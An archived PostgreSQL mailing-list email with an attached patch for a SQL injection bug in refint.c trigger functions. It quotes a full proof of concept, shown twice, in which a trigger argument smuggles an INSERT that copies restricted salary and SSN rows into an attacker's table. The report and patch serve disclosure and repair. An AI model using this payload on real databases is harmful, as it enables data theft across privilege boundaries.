MIME-Version: 1.0
References: <19510-953c48eaf669350b@postgresql.org>
In-Reply-To: <19510-953c48eaf669350b@postgresql.org>
From: Amjad Shahzad <amjadshahzad2000@gmail.com>
Date: Fri, 5 Jun 2026 04:50:52 +0500
Message-ID: 
 <CADHzGZQ9qM-JrTN+mBRHapDYVKymPV=E39nV5aB_N+sSTR=35A@mail.gmail.com>
Subject: Re: BUG #19510: refint.c: SQL injection via unquoted identifier
 arguments in check_primary_key and check_foreign_key
To: amjadshahzad2000@gmail.com, pgsql-bugs@lists.postgresql.org
Content-Type: multipart/mixed; boundary="000000000000ea7db3065376379b"
Archived-At: 
 <https://www.postgresql.org/message-id/CADHzGZQ9qM-JrTN%2BmBRHapDYVKymPV%3DE39nV5aB_N%2BsSTR%3D35A%40mail.gmail.com>
Precedence: bulk

--000000000000ea7db3065376379b
Content-Type: multipart/alternative; boundary="000000000000ea7db20653763799"

--000000000000ea7db20653763799
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

Hi,

Patch attached for the issue reported above.

Applies cleanly against master.
All 9 unquoted identifier sites are fixed across bothcheck_primary_key()
and check_foreign_key() usingquote_identifier().

Regards
Amjad

On Fri, Jun 5, 2026 at 4:34=E2=80=AFAM PG Bug reporting form <noreply@postg=
resql.org>
wrote:

> The following bug has been logged on the website:
>
> Bug reference:      19510
> Logged by:          Amjad Shahzad
> Email address:      amjadshahzad2000@gmail.com
> PostgreSQL version: 18.4
> Operating system:   Ubuntu 24.04 x86_64
> Description:
>
> Both check_primary_key() and check_foreign_key() build SQL queries by
> interpolating trigger arguments (table names and column names from
> trigger->tgargs) directly into generated queries without quoting:
>
>     appendStringInfo(&sql, "select 1 from %s where ", relname);
>     appendStringInfo(&sql, "%s =3D $%d ", args[i + nkeys], i);
>
> A user who owns a table that a higher-privileged session writes to can
> place
> injected SQL inside the table-name or column-name argument of the CREATE
> TRIGGER call. When the privileged user INSERTs into the table, the inject=
ed
> SQL runs in that user's security context, giving the attacker read/write
> access to tables they cannot directly access.
>
> Note: CVE-2026-6637 (commit 260e97733bf) fixed injection of data VALUES i=
n
> the cascade-UPDATE path via quote_literal_cstr(). This report covers the
> separate, still-open issue of unquoted IDENTIFIER arguments (relname and
> column names from tgargs) not addressed by that fix. Verified on master
> commit 0392fb900eb.
>
> Affected versions: PG14, PG15, PG16, PG17, PG18, master.
>
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> PREREQUISITES
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> - Attacker owns a table (any table they created)
> - A higher-privileged user has INSERT on that table
> - contrib/spi module installed (CREATE EXTENSION spi)
>
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> STEPS TO REPRODUCE
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> -- STEP 1: Create roles
> CREATE ROLE app_user LOGIN PASSWORD 'pass';
> CREATE ROLE attacker  LOGIN PASSWORD 'pass';
>
> -- STEP 2: Create sensitive table, only app_user can read it
> CREATE TABLE salaries (
>     id       serial PRIMARY KEY,
>     emp_name text,
>     salary   numeric,
>     ssn      text
> );
> INSERT INTO salaries VALUES
>     (1, 'Alice', 120000, '123-45-6789'),
>     (2, 'Bob',    95000, '987-65-4321'),
>     (3, 'Carol', 150000, '456-78-9012');
> GRANT SELECT ON salaries TO app_user;
>
> -- STEP 3: Attacker creates their table and a log for stolen data
> SET ROLE attacker;
> CREATE TABLE orders (
>     id          serial PRIMARY KEY,
>     customer_id int,
>     amount      numeric
> );
> CREATE TABLE stolen_data (
>     info      text,
>     stolen_at timestamptz DEFAULT now()
> );
> GRANT INSERT ON orders TO app_user;
>
> -- STEP 4: Attacker creates malicious trigger using injected table name
> CREATE EXTENSION spi;
> CREATE TRIGGER evil_trigger
> AFTER INSERT ON orders
> FOR EACH ROW
> EXECUTE FUNCTION check_primary_key(
>     'customer_id',
>     'customers LIMIT 0; INSERT INTO stolen_data(info)
>      SELECT emp_name || '' | '' || salary::text || '' | '' || ssn
>      FROM salaries; --',
>     'id'
> );
> -- Result: CREATE TRIGGER  (no error)
>
> -- STEP 5: app_user does normal inserts (no idea anything is wrong)
> SET ROLE app_user;
> INSERT INTO orders (customer_id, amount) VALUES (1, 500.00);
> INSERT INTO orders (customer_id, amount) VALUES (2, 300.00);
> INSERT INTO orders (customer_id, amount) VALUES (3, 750.00);
> -- Result: INSERT 0 1  (three times, looks normal)
>
> -- STEP 6: Attacker reads stolen data
> SET ROLE attacker;
> SELECT * FROM stolen_data;
>
> -- Output:
> --           info               |        stolen_at
> -- ------------------------------+--------------------------
> --  Alice | 120000 | 123-45-6789 | 2026-05-21 16:10:50+05
> --  Bob   | 95000  | 987-65-4321 | 2026-05-21 16:10:50+05
> --  Carol | 150000 | 456-78-9012 | 2026-05-21 16:10:50+05
> -- (3 rows)
>
> -- STEP 7: Confirm attacker still has no direct access
> SELECT * FROM salaries;
> -- ERROR:  permission denied for table salaries
>
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> THE FIX
> =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
> Wrap every relname and column-name interpolation with quote_identifier():
>
>     -- BEFORE
>     appendStringInfo(&sql, "select 1 from %s where ", relname);
>
>     -- AFTER
>     appendStringInfo(&sql, "select 1 from %s where ",
> quote_identifier(relname));
>
> 9 sites total across both functions.
>
>
>

--000000000000ea7db20653763799
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable

<div dir=3D"ltr">Hi,<br><br>Patch attached for the issue reported above.<br=
><br>Applies cleanly against master.<br>All 9 unquoted identifier sites are=
 fixed across bothcheck_primary_key() and check_foreign_key() usingquote_id=
entifier().<br><br>Regards<div>Amjad</div></div><br><div class=3D"gmail_quo=
te"><div dir=3D"ltr" class=3D"gmail_attr">On Fri, Jun 5, 2026 at 4:34=E2=80=
=AFAM PG Bug reporting form &lt;<a href=3D"mailto:noreply@postgresql.org" t=
arget=3D"_blank">noreply@postgresql.org</a>&gt; wrote:<br></div><blockquote=
 class=3D"gmail_quote" style=3D"margin:0px 0px 0px 0.8ex;border-left:1px so=
lid rgb(204,204,204);padding-left:1ex">The following bug has been logged on=
 the website:<br>
<br>
Bug reference:=C2=A0 =C2=A0 =C2=A0 19510<br>
Logged by:=C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 Amjad Shahzad<br>
Email address:=C2=A0 =C2=A0 =C2=A0 <a href=3D"mailto:amjadshahzad2000@gmail=
.com" target=3D"_blank">amjadshahzad2000@gmail.com</a><br>
PostgreSQL version: 18.4<br>
Operating system:=C2=A0 =C2=A0Ubuntu 24.04 x86_64<br>
Description:=C2=A0 =C2=A0 =C2=A0 =C2=A0 <br>
<br>
Both check_primary_key() and check_foreign_key() build SQL queries by<br>
interpolating trigger arguments (table names and column names from<br>
trigger-&gt;tgargs) directly into generated queries without quoting:<br>
<br>
=C2=A0 =C2=A0 appendStringInfo(&amp;sql, &quot;select 1 from %s where &quot=
;, relname);<br>
=C2=A0 =C2=A0 appendStringInfo(&amp;sql, &quot;%s =3D $%d &quot;, args[i + =
nkeys], i);<br>
<br>
A user who owns a table that a higher-privileged session writes to can plac=
e<br>
injected SQL inside the table-name or column-name argument of the CREATE<br=
>
TRIGGER call. When the privileged user INSERTs into the table, the injected=
<br>
SQL runs in that user&#39;s security context, giving the attacker read/writ=
e<br>
access to tables they cannot directly access.<br>
<br>
Note: CVE-2026-6637 (commit 260e97733bf) fixed injection of data VALUES in<=
br>
the cascade-UPDATE path via quote_literal_cstr(). This report covers the<br=
>
separate, still-open issue of unquoted IDENTIFIER arguments (relname and<br=
>
column names from tgargs) not addressed by that fix. Verified on master<br>
commit 0392fb900eb.<br>
<br>
Affected versions: PG14, PG15, PG16, PG17, PG18, master.<br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
PREREQUISITES<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
- Attacker owns a table (any table they created)<br>
- A higher-privileged user has INSERT on that table<br>
- contrib/spi module installed (CREATE EXTENSION spi)<br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
STEPS TO REPRODUCE<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
-- STEP 1: Create roles<br>
CREATE ROLE app_user LOGIN PASSWORD &#39;pass&#39;;<br>
CREATE ROLE attacker=C2=A0 LOGIN PASSWORD &#39;pass&#39;;<br>
<br>
-- STEP 2: Create sensitive table, only app_user can read it<br>
CREATE TABLE salaries (<br>
=C2=A0 =C2=A0 id=C2=A0 =C2=A0 =C2=A0 =C2=A0serial PRIMARY KEY,<br>
=C2=A0 =C2=A0 emp_name text,<br>
=C2=A0 =C2=A0 salary=C2=A0 =C2=A0numeric,<br>
=C2=A0 =C2=A0 ssn=C2=A0 =C2=A0 =C2=A0 text<br>
);<br>
INSERT INTO salaries VALUES<br>
=C2=A0 =C2=A0 (1, &#39;Alice&#39;, 120000, &#39;123-45-6789&#39;),<br>
=C2=A0 =C2=A0 (2, &#39;Bob&#39;,=C2=A0 =C2=A0 95000, &#39;987-65-4321&#39;)=
,<br>
=C2=A0 =C2=A0 (3, &#39;Carol&#39;, 150000, &#39;456-78-9012&#39;);<br>
GRANT SELECT ON salaries TO app_user;<br>
<br>
-- STEP 3: Attacker creates their table and a log for stolen data<br>
SET ROLE attacker;<br>
CREATE TABLE orders (<br>
=C2=A0 =C2=A0 id=C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 serial PRIMARY KEY,<br>
=C2=A0 =C2=A0 customer_id int,<br>
=C2=A0 =C2=A0 amount=C2=A0 =C2=A0 =C2=A0 numeric<br>
);<br>
CREATE TABLE stolen_data (<br>
=C2=A0 =C2=A0 info=C2=A0 =C2=A0 =C2=A0 text,<br>
=C2=A0 =C2=A0 stolen_at timestamptz DEFAULT now()<br>
);<br>
GRANT INSERT ON orders TO app_user;<br>
<br>
-- STEP 4: Attacker creates malicious trigger using injected table name<br>
CREATE EXTENSION spi;<br>
CREATE TRIGGER evil_trigger<br>
AFTER INSERT ON orders<br>
FOR EACH ROW<br>
EXECUTE FUNCTION check_primary_key(<br>
=C2=A0 =C2=A0 &#39;customer_id&#39;,<br>
=C2=A0 =C2=A0 &#39;customers LIMIT 0; INSERT INTO stolen_data(info)<br>
=C2=A0 =C2=A0 =C2=A0SELECT emp_name || &#39;&#39; | &#39;&#39; || salary::t=
ext || &#39;&#39; | &#39;&#39; || ssn<br>
=C2=A0 =C2=A0 =C2=A0FROM salaries; --&#39;,<br>
=C2=A0 =C2=A0 &#39;id&#39;<br>
);<br>
-- Result: CREATE TRIGGER=C2=A0 (no error)<br>
<br>
-- STEP 5: app_user does normal inserts (no idea anything is wrong)<br>
SET ROLE app_user;<br>
INSERT INTO orders (customer_id, amount) VALUES (1, 500.00);<br>
INSERT INTO orders (customer_id, amount) VALUES (2, 300.00);<br>
INSERT INTO orders (customer_id, amount) VALUES (3, 750.00);<br>
-- Result: INSERT 0 1=C2=A0 (three times, looks normal)<br>
<br>
-- STEP 6: Attacker reads stolen data<br>
SET ROLE attacker;<br>
SELECT * FROM stolen_data;<br>
<br>
-- Output:<br>
--=C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0 =C2=A0info=C2=A0 =C2=A0 =C2=A0 =C2=A0 =
=C2=A0 =C2=A0 =C2=A0 =C2=A0|=C2=A0 =C2=A0 =C2=A0 =C2=A0 stolen_at<br>
-- ------------------------------+--------------------------<br>
--=C2=A0 Alice | 120000 | 123-45-6789 | 2026-05-21 16:10:50+05<br>
--=C2=A0 Bob=C2=A0 =C2=A0| 95000=C2=A0 | 987-65-4321 | 2026-05-21 16:10:50+=
05<br>
--=C2=A0 Carol | 150000 | 456-78-9012 | 2026-05-21 16:10:50+05<br>
-- (3 rows)<br>
<br>
-- STEP 7: Confirm attacker still has no direct access<br>
SELECT * FROM salaries;<br>
-- ERROR:=C2=A0 permission denied for table salaries<br>
<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
THE FIX<br>
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D<br>
Wrap every relname and column-name interpolation with quote_identifier():<b=
r>
<br>
=C2=A0 =C2=A0 -- BEFORE<br>
=C2=A0 =C2=A0 appendStringInfo(&amp;sql, &quot;select 1 from %s where &quot=
;, relname);<br>
<br>
=C2=A0 =C2=A0 -- AFTER<br>
=C2=A0 =C2=A0 appendStringInfo(&amp;sql, &quot;select 1 from %s where &quot=
;,<br>
quote_identifier(relname));<br>
<br>
9 sites total across both functions.<br>
<br>
<br>
</blockquote></div>

--000000000000ea7db20653763799--

--000000000000ea7db3065376379b
Content-Type: application/x-patch;
	name="v1-fix-refint-identifier-injection.patch"
Content-Disposition: attachment;
	filename="v1-fix-refint-identifier-injection.patch"
Content-Transfer-Encoding: base64
Content-ID: <f_mq051hw50>
X-Attachment-Id: f_mq051hw50

ZGlmZiAtLWdpdCBhL2NvbnRyaWIvc3BpL3JlZmludC5jIGIvY29udHJpYi9zcGkvcmVmaW50LmMK
aW5kZXggNDg1MTJhNjY0ZDIuLjBlN2YyYzAzM2M0IDEwMDY0NAotLS0gYS9jb250cmliL3NwaS9y
ZWZpbnQuYworKysgYi9jb250cmliL3NwaS9yZWZpbnQuYwpAQCAtMTc5LDEwICsxNzksMTAgQEAg
Y2hlY2tfcHJpbWFyeV9rZXkoUEdfRlVOQ1RJT05fQVJHUykKIAkJICogQ29uc3RydWN0IHF1ZXJ5
OiBTRUxFQ1QgMSBGUk9NIF9yZWZlcmVuY2VkX3JlbGF0aW9uXyBXSEVSRSBQa2V5MSA9CiAJCSAq
ICQxIFtBTkQgUGtleTIgPSAkMiBbLi4uXV0KIAkJICovCi0JCWFwcGVuZFN0cmluZ0luZm8oJnNx
bCwgInNlbGVjdCAxIGZyb20gJXMgd2hlcmUgIiwgcmVsbmFtZSk7CisJCWFwcGVuZFN0cmluZ0lu
Zm8oJnNxbCwgInNlbGVjdCAxIGZyb20gJXMgd2hlcmUgIiwgcXVvdGVfaWRlbnRpZmllcihyZWxu
YW1lKSk7CiAJCWZvciAoaSA9IDE7IGkgPD0gbmtleXM7IGkrKykKIAkJewotCQkJYXBwZW5kU3Ry
aW5nSW5mbygmc3FsLCAiJXMgPSAkJWQgIiwgYXJnc1tpICsgbmtleXNdLCBpKTsKKwkJCWFwcGVu
ZFN0cmluZ0luZm8oJnNxbCwgIiVzID0gJCVkICIsIHF1b3RlX2lkZW50aWZpZXIoYXJnc1tpICsg
bmtleXNdKSwgaSk7CiAJCQlpZiAoaSA8IG5rZXlzKQogCQkJCWFwcGVuZFN0cmluZ0luZm9TdHJp
bmcoJnNxbCwgImFuZCAiKTsKIAkJfQpAQCAtNDUyLDcgKzQ1Miw3IEBAIGNoZWNrX2ZvcmVpZ25f
a2V5KFBHX0ZVTkNUSU9OX0FSR1MpCiAJCQkgKi0tLS0tLS0tLQogCQkJICovCiAJCQlpZiAoYWN0
aW9uID09ICdyJykKLQkJCQlhcHBlbmRTdHJpbmdJbmZvKCZzcWwsICJzZWxlY3QgMSBmcm9tICVz
IHdoZXJlICIsIHJlbG5hbWUpOworCQkJCWFwcGVuZFN0cmluZ0luZm8oJnNxbCwgInNlbGVjdCAx
IGZyb20gJXMgd2hlcmUgIiwgcXVvdGVfaWRlbnRpZmllcihyZWxuYW1lKSk7CiAKIAkJCS8qLS0t
LS0tLS0tCiAJCQkgKiBGb3IgJ0MnYXNjYWRlIGFjdGlvbiB3ZSBjb25zdHJ1Y3QgREVMRVRFIHF1
ZXJ5CkBAIC00NzksNyArNDc5LDcgQEAgY2hlY2tfZm9yZWlnbl9rZXkoUEdfRlVOQ1RJT05fQVJH
UykKIAkJCQkJY2hhcgkgICAqbnY7CiAJCQkJCWludAkJCWs7CiAKLQkJCQkJYXBwZW5kU3RyaW5n
SW5mbygmc3FsLCAidXBkYXRlICVzIHNldCAiLCByZWxuYW1lKTsKKwkJCQkJYXBwZW5kU3RyaW5n
SW5mbygmc3FsLCAidXBkYXRlICVzIHNldCAiLCBxdW90ZV9pZGVudGlmaWVyKHJlbG5hbWUpKTsK
IAkJCQkJZm9yIChrID0gMTsgayA8PSBua2V5czsgaysrKQogCQkJCQl7CiAJCQkJCQlmbiA9IFNQ
SV9mbnVtYmVyKHR1cGRlc2MsIGFyZ3NfdGVtcFtrIC0gMV0pOwpAQCAtNDg3LDcgKzQ4Nyw3IEBA
IGNoZWNrX2ZvcmVpZ25fa2V5KFBHX0ZVTkNUSU9OX0FSR1MpCiAJCQkJCQludiA9IFNQSV9nZXR2
YWx1ZShuZXd0dXBsZSwgdHVwZGVzYywgZm4pOwogCiAJCQkJCQlhcHBlbmRTdHJpbmdJbmZvKCZz
cWwsICIgJXMgPSAlcyAiLAotCQkJCQkJCQkJCSBhcmdzMltrXSwKKwkJCQkJCQkJCQkgcXVvdGVf
aWRlbnRpZmllcihhcmdzMltrXSksCiAJCQkJCQkJCQkJIG52ID8gcXVvdGVfbGl0ZXJhbF9jc3Ry
KG52KSA6ICJOVUxMIik7CiAJCQkJCQlpZiAoayA8IG5rZXlzKQogCQkJCQkJCWFwcGVuZFN0cmlu
Z0luZm9TdHJpbmcoJnNxbCwgIiwgIik7CkBAIC00OTYsNyArNDk2LDcgQEAgY2hlY2tfZm9yZWln
bl9rZXkoUEdfRlVOQ1RJT05fQVJHUykKIAkJCQl9CiAJCQkJZWxzZQogCQkJCQkvKiBERUxFVEUg
Ki8KLQkJCQkJYXBwZW5kU3RyaW5nSW5mbygmc3FsLCAiZGVsZXRlIGZyb20gJXMgd2hlcmUgIiwg
cmVsbmFtZSk7CisJCQkJCWFwcGVuZFN0cmluZ0luZm8oJnNxbCwgImRlbGV0ZSBmcm9tICVzIHdo
ZXJlICIsIHF1b3RlX2lkZW50aWZpZXIocmVsbmFtZSkpOwogCQkJfQogCiAJCQkvKgpAQCAtNTA3
LDEwICs1MDcsMTAgQEAgY2hlY2tfZm9yZWlnbl9rZXkoUEdfRlVOQ1RJT05fQVJHUykKIAkJCSAq
LwogCQkJZWxzZSBpZiAoYWN0aW9uID09ICdzJykKIAkJCXsKLQkJCQlhcHBlbmRTdHJpbmdJbmZv
KCZzcWwsICJ1cGRhdGUgJXMgc2V0ICIsIHJlbG5hbWUpOworCQkJCWFwcGVuZFN0cmluZ0luZm8o
JnNxbCwgInVwZGF0ZSAlcyBzZXQgIiwgcXVvdGVfaWRlbnRpZmllcihyZWxuYW1lKSk7CiAJCQkJ
Zm9yIChpID0gMTsgaSA8PSBua2V5czsgaSsrKQogCQkJCXsKLQkJCQkJYXBwZW5kU3RyaW5nSW5m
bygmc3FsLCAiJXMgPSBudWxsIiwgYXJnczJbaV0pOworCQkJCQlhcHBlbmRTdHJpbmdJbmZvKCZz
cWwsICIlcyA9IG51bGwiLCBxdW90ZV9pZGVudGlmaWVyKGFyZ3MyW2ldKSk7CiAJCQkJCWlmIChp
IDwgbmtleXMpCiAJCQkJCQlhcHBlbmRTdHJpbmdJbmZvU3RyaW5nKCZzcWwsICIsICIpOwogCQkJ
CX0KQEAgLTUyMCw3ICs1MjAsNyBAQCBjaGVja19mb3JlaWduX2tleShQR19GVU5DVElPTl9BUkdT
KQogCQkJLyogQ29uc3RydWN0IFdIRVJFIHF1YWwgKi8KIAkJCWZvciAoaSA9IDE7IGkgPD0gbmtl
eXM7IGkrKykKIAkJCXsKLQkJCQlhcHBlbmRTdHJpbmdJbmZvKCZzcWwsICIlcyA9ICQlZCAiLCBh
cmdzMltpXSwgaSk7CisJCQkJYXBwZW5kU3RyaW5nSW5mbygmc3FsLCAiJXMgPSAkJWQgIiwgcXVv
dGVfaWRlbnRpZmllcihhcmdzMltpXSksIGkpOwogCQkJCWlmIChpIDwgbmtleXMpCiAJCQkJCWFw
cGVuZFN0cmluZ0luZm9TdHJpbmcoJnNxbCwgImFuZCAiKTsKIAkJCX0K
--000000000000ea7db3065376379b--